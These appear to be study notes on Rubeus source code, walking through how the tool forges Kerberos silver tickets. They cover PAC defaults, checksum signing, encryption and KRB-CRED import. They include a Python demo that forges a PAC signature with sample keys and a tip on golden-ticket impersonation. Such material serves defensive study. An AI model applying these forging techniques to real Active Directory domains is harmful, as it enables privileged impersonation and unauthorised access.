Rubeus Source Code Review

#silver

Silver

In Rubeus.exe!Rubeus.ForgeTickets.ForgeTicket(), at the comment // initialise LogonInfo section and set defaults, the LogonInfo structure (kvi) is created and filled with defaults. Some group IDs are hardcoded into it: ![[Pasted image 20220812213351.png]] The user account control value defaults to Rubeus.Interop.PacUserAccountControl.NORMAL_ACCOUNT = 16 (0x10).

Side note: when forging a golden ticket it is best to impersonate a domain controller's account, and to use /extrasids.

Data struct

KRB_CRED cred = new KRB_CRED();

Takeaway

When forging a silver ticket, Rubeus forges the TGS-REP service ticket manually in ForgeTickets.ForgeTicket(). The kvi variable holds the PAC logon info, initialised with var kvi = Ndr._KERB_VALIDATION_INFO.CreateDefault(). It includes the UserId (500 if not specified with /id), the PrimaryGroupId (513 if not specified with /pgid) and the group list (if nothing is given with /groups, the groups 520, 512, 513, 519 and 518 are added by default). If /ldap is specified, Rubeus looks up the account and sets all of the user's account information in the PAC for us (think of the PAC as the container for all client information: logon script, password expiry, SIDs, and so on).

After the PAC fields are set, a random session key is generated according to the etype (if it is rc4 the session key is 16 bytes, if it is aes256 it is 32 bytes). Next it tries to determine the krbKey, i.e. the key krbtgt uses, since the KDC checksum is made with it. For a silver ticket the krbKey doesn't matter: the ticket goes directly to the service, which decrypts it with its own key.

After that, EncTicketPart decTicketPart = new EncTicketPart(randKeyBytes, etype, cRealm.ToUpper(), cName, flags, cn.ClientId); creates the basic framework of the ticket prior to encryption (decTicketPart is simply the decrypted, plaintext form of the ticket; the encrypted bytes are encTicketPart). The last pieces (authorization_data placeholder, endtime) are added afterwards. The signature fields inside the authorization_data placeholder are filled with null bytes, and the checksums are calculated over the PAC with those fields zeroed. The KDC checksum is computed with the krbKey again; this doesn't matter for a silver ticket because PAC validation with the KDC is not enabled by default (a service running as SYSTEM, i.e. with SeTcbPrivilege, does not verify the KDC signature), so we just have to put something there. ==end of PAC and basic ticket initialisation==

Now comes signing the PAC. Rubeus uses a list named PacInfoBuffers to hold all the PAC buffers: it adds the kvi (LogonInfo), cn (ClientName), upnDns (UPN/DNS info) and the svrSigData / KdcSigData signature buffers, computes the checksums (the server checksum over the PAC with the service key, the KDC checksum over the server checksum with the krbKey), and attaches the PAC to the previously initialised ticket structure, which already contains the session key and cname. When that's finished, it finally encrypts the whole ticket (the EncTicketPart) with the serviceKey provided by the user. ==keep in mind this is only the ticket itself; to be usable it still has to be wrapped in a KRB-CRED (.kirbi) structure together with the session key, so that LSASS can import it and build the AP-REQ that is sent to the service==.
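The zero-then-sign rule described above, as an added example that is not Rubeus's code: both PAC checksums are computed with the signature slots nulled, the server checksum with the service key and the KDC checksum over the server checksum with the krbtgt key, using the KERB_CHECKSUM_HMAC_MD5 algorithm of the RC4 etype. The PAC layout (body followed by two fixed-size signature slots), the keys and the PAC body bytes are constructed stand-ins; a real PAC places the signatures in PAC_INFO_BUFFER entries located by offset, and AES tickets use HMAC-SHA1-96 instead.

```python
"""PAC signing as Rubeus does it for an RC4 (etype 23) silver ticket.

Added example, not Rubeus's own code. The PAC layout is a constructed
simplification: body || server_signature || kdc_signature, with the two
signature slots zero-filled while the checksums are computed.
"""
import hashlib
import hmac
import secrets
import struct
from typing import Optional, Tuple

# Key-usage number for both PAC signatures (MS-PAC 2.8.1, KERB_NON_KERB_CKSUM_SALT).
PAC_KEY_USAGE = 17
# KERB_CHECKSUM_HMAC_MD5 yields a 16-byte signature; that is the size of the null placeholder.
SIG_LEN = 16
# Session-key sizes Rubeus picks per etype in ForgeTicket().
SESSION_KEY_LEN = {"rc4": 16, "aes128": 16, "aes256": 32}


def random_session_key(etype: str) -> bytes:
    """Random session key of the length Rubeus uses for the given etype."""
    return secrets.token_bytes(SESSION_KEY_LEN[etype])


def hmac_md5_checksum(key: bytes, data: bytes, usage: int = PAC_KEY_USAGE) -> bytes:
    """KERB_CHECKSUM_HMAC_MD5 (RFC 4757 section 4):
    Ksign = HMAC-MD5(K, "signaturekey\\0"), tmp = MD5(usage_le32 || data),
    checksum = HMAC-MD5(Ksign, tmp)."""
    ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
    inner = hashlib.md5(struct.pack("<I", usage) + data).digest()
    return hmac.new(ksign, inner, hashlib.md5).digest()


def assemble_pac(body: bytes, server_sig: bytes, kdc_sig: bytes) -> bytes:
    """Constructed PAC layout: body followed by the two fixed-size signature slots."""
    if len(server_sig) != SIG_LEN or len(kdc_sig) != SIG_LEN:
        raise ValueError("signature slots must be exactly SIG_LEN bytes")
    return body + server_sig + kdc_sig


def sign_pac(body: bytes, service_key: bytes, krbtgt_key: bytes) -> bytes:
    """Server checksum over the PAC with both slots zeroed, keyed with the service key;
    KDC checksum over the server checksum, keyed with the krbtgt key."""
    zeroed = assemble_pac(body, bytes(SIG_LEN), bytes(SIG_LEN))
    server_sig = hmac_md5_checksum(service_key, zeroed)
    kdc_sig = hmac_md5_checksum(krbtgt_key, server_sig)
    return assemble_pac(body, server_sig, kdc_sig)


def verify_pac(pac: bytes, service_key: bytes,
               krbtgt_key: Optional[bytes] = None) -> Tuple[bool, Optional[bool]]:
    """Return (server_ok, kdc_ok). kdc_ok is None when no krbtgt key is given, which
    mirrors a service that never asks the KDC to validate the PAC (the default)."""
    body = pac[:-2 * SIG_LEN]
    server_sig = pac[-2 * SIG_LEN:-SIG_LEN]
    kdc_sig = pac[-SIG_LEN:]
    zeroed = assemble_pac(body, bytes(SIG_LEN), bytes(SIG_LEN))
    server_ok = hmac.compare_digest(hmac_md5_checksum(service_key, zeroed), server_sig)
    if krbtgt_key is None:
        return server_ok, None
    kdc_ok = hmac.compare_digest(hmac_md5_checksum(krbtgt_key, server_sig), kdc_sig)
    return server_ok, kdc_ok


# Constructed sample values (not real hashes): the service's RC4 key, the real krbtgt key
# the attacker does not have, and a stand-in for the NDR-encoded LogonInfo/ClientName buffers.
SERVICE_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef")
REAL_KRBTGT_KEY = bytes.fromhex("fedcba9876543210fedcba9876543210")
PAC_BODY = b"LOGON_INFO{uid=500,pgid=513,groups=520,512,513,519,518}CLIENT_NAME{Administrator}"


def forge_silver_pac() -> bytes:
    """Silver-ticket case: the server signature is valid, the KDC signature is made
    with a random key because the krbtgt key is unknown."""
    return sign_pac(PAC_BODY, SERVICE_KEY, secrets.token_bytes(16))


if __name__ == "__main__":
    pac = forge_silver_pac()
    print("service-only check:", verify_pac(pac, SERVICE_KEY))
    print("with KDC validation:", verify_pac(pac, SERVICE_KEY, REAL_KRBTGT_KEY))
```

Running it shows why the krbKey is irrelevant for a silver ticket: the service-only check passes, and only a verifier holding the real krbtgt key notices that the KDC signature is bogus.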

We do that by initialising Ticket ticket = new Ticket(domain.ToUpper(), sname); and setting our encrypted service ticket as ticket.enc_part = new EncryptedData((Int32)etype, encTicketPart, 3); (kvno 3). The ticket structure is then added to cred (the KRB_CRED struct, our final data handed to lsass.exe), and the session key that was previously put into decTicketPart is copied into info (a KrbCredInfo: the cleartext description of the ticket, i.e. session key, client principal, flags and times, which LSASS needs to build the AP-REQ with this ticket). pname (which is just cname), the renewal time etc. are added to cred.enc_part.ticket_info. Finally, /ptt imports the resulting KRB-CRED into the current logon session.